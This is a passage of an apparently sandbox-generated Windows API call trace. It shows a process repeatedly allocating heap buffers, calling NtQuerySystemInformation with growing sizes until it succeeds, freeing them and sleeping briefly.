SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.373] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0245.373] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0245.373] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.374] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0245.374] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0245.374] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.374] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0245.374] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0245.375] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0245.375] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0245.375] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0245.376] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0245.376] Sleep (dwMilliseconds=0x110) [0245.389] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0245.389] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.390] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0245.390] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0245.390] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.391] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0245.394] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0245.394] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.394] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0245.394] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0245.395] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0245.395] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0245.395] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0245.395] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0245.395] Sleep (dwMilliseconds=0x110) [0245.418] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7f8 [0245.418] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7f8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7f8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.419] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7f8 | out: hHeap=0x2560000) returned 1 [0245.419] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0245.419] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.419] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0245.419] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0245.419] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.420] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0245.420] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0245.420] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0245.433] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0245.433] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0245.434] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0245.437] Sleep (dwMilliseconds=0x110) [0245.454] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0245.454] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.455] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0245.455] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aaf0 [0245.455] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aaf0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aaf0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.456] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aaf0 | out: hHeap=0x2560000) returned 1 [0245.456] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0245.456] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.456] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0245.456] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0245.456] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0245.457] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0245.457] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0245.457] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0245.457] Sleep (dwMilliseconds=0x110) [0245.469] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0245.469] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.469] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0245.469] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0245.469] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.470] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0245.470] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0245.470] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.470] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0245.470] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0245.470] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0245.470] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0245.470] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0245.471] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0245.471] Sleep (dwMilliseconds=0x110) [0245.485] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0245.485] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.486] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0245.486] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0245.486] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.487] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0245.487] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b640 [0245.487] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b640, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b640, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.488] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b640 | out: hHeap=0x2560000) returned 1 [0245.488] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d260 [0245.488] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d260, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d260, ResultLength=0x19ee88*=0xc0) returned 0x0 [0245.489] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d260 | out: hHeap=0x2560000) returned 1 [0245.489] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0245.489] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0245.489] Sleep (dwMilliseconds=0x110) [0245.501] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0245.501] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.502] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0245.502] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0245.502] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.503] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0245.503] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c3e8 [0245.503] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c3e8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c3e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.504] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c3e8 | out: hHeap=0x2560000) returned 1 [0245.504] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0245.504] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0245.505] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0245.505] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0245.505] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0245.505] Sleep (dwMilliseconds=0x110) [0245.513] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0245.513] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.514] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0245.514] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0245.514] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.514] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0245.514] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0245.514] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.515] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0245.515] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0245.515] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0245.515] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0245.515] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0245.516] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0245.516] Sleep (dwMilliseconds=0x110) [0245.532] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0245.532] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.533] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0245.533] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a610 [0245.533] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a610, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a610, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.534] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a610 | out: hHeap=0x2560000) returned 1 [0245.534] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c2b8 [0245.534] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c2b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c2b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.534] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c2b8 | out: hHeap=0x2560000) returned 1 [0245.534] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0245.534] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0245.535] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0245.535] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0245.536] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0245.536] Sleep (dwMilliseconds=0x110) [0245.544] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0245.544] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.545] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0245.545] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0245.545] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.545] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0245.545] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c350 [0245.545] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c350, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c350, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.546] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c350 | out: hHeap=0x2560000) returned 1 [0245.546] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0245.546] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0245.547] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0245.547] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0245.548] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0245.548] Sleep (dwMilliseconds=0x110) [0245.564] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0245.564] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.565] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0245.565] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0245.565] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.566] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0245.566] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c0f0 [0245.566] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c0f0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c0f0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.567] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c0f0 | out: hHeap=0x2560000) returned 1 [0245.567] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0245.567] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0245.568] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0245.571] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0245.571] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0245.571] Sleep (dwMilliseconds=0x110) [0245.575] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0245.575] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.576] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0245.576] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0245.577] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.577] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0245.578] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0245.578] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.578] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0245.578] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c838 [0245.578] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c838, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c838, ResultLength=0x19ee88*=0xc0) returned 0x0 [0245.580] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c838 | out: hHeap=0x2560000) returned 1 [0245.580] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0245.581] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0245.581] Sleep (dwMilliseconds=0x110) [0245.594] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0245.594] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.594] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0245.594] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0245.594] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.595] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0245.595] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c350 [0245.595] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c350, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c350, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.595] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c350 | out: hHeap=0x2560000) returned 1 [0245.595] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d3f0 [0245.595] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d3f0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d3f0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0245.596] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d3f0 | out: hHeap=0x2560000) returned 1 [0245.596] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0245.596] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0245.596] Sleep (dwMilliseconds=0x110) [0245.606] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0245.606] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.607] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0245.607] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0245.607] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.607] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0245.608] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0245.608] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.608] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0245.608] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0245.608] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0245.609] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0245.609] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0245.609] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: 